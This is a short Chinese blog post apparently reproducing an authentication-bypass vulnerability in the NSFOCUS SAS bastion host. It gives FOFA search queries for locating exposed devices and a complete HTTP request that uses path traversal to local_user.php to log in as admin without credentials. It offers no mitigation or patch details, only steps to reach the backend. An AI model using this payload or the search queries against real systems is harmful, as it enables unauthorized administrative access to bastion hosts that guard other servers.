Babing
Published on 2024-08-30 / 2 Visits
0
0

L5-3绿盟-SAS堡垒机-PermissionAC

L5-3绿盟-SAS堡垒机-PermissionAC

漏洞描述:

绿盟 SAS堡垒机 local_user.php接口处存在权限绕过漏洞,未经身份认证的攻击者可以访问他们通常无权访问的敏感资源,最终导致系统处于极度不安全状态。

网站图片:

d3a23f2ca85245928fa2ec2d5e99a045.png

网络测绘:

fofa语法:

body=“'/needUsbkey.php'” || body=“/login_logo_sas_h_zh_CN.png”

漏洞复现:

payload:

GET /api/virtual/home/status?cat=./././././././usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

效果图:
使用HackBar测试

重新刷新页面即可进入后台


Comment